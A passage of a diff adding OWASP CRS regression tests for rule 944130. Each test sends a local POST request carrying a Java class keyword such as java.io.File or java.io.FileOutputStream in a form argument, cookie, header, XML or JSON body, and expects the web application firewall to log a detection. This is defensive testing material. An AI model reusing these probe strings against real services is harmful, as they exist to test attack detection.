keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-70 + desc: "Cookie name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-71 + desc: "Request header test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-72 + desc: "XML attribute value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-73 + desc: "XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-74 + desc: "Nested XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-75 + desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-76 + desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-77 + desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-78 + desc: "Argument test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-79 + desc: "Argument name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-80 + desc: "Cookie test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-81 + desc: "Cookie name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-82 + desc: "Request header test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-83 + desc: "XML attribute value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-84 + desc: "XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-85 + desc: "Nested XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-86 + desc: "Content-Type text/plain includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-87 + desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-88 + desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-89 + desc: "Argument test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-90 + desc: "Argument name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-91 + desc: "Cookie test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-92 + desc: "Cookie name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-93 + desc: "Request header test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-94 + desc: "XML attribute value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-95 + desc: "XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-96 + desc: "Nested XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-97 + desc: "Content-Type text/plain includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-98 + desc: "Content-Type application/json arg value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-99 + desc: "Content-Type application/json arg name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-100 + desc: "Argument test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-101 + desc: "Argument name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-102 + desc: "Cookie test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-103 + desc: "Cookie name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-104 + desc: "Request header test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-105 + desc: "XML attribute value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-106 + desc: "XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-107 + desc: "Nested XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-108 + desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-109 + desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-110 + desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-111 + desc: "Argument test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-112 + desc: "Argument name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-113 + desc: "Cookie test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-114 + desc: "Cookie name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-115 + desc: "Request header test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-116 + desc: "XML attribute value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-117 + desc: "XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-118 + desc: "Nested XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-119 + desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-120 + desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-121 + desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-122 + desc: "Argument test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 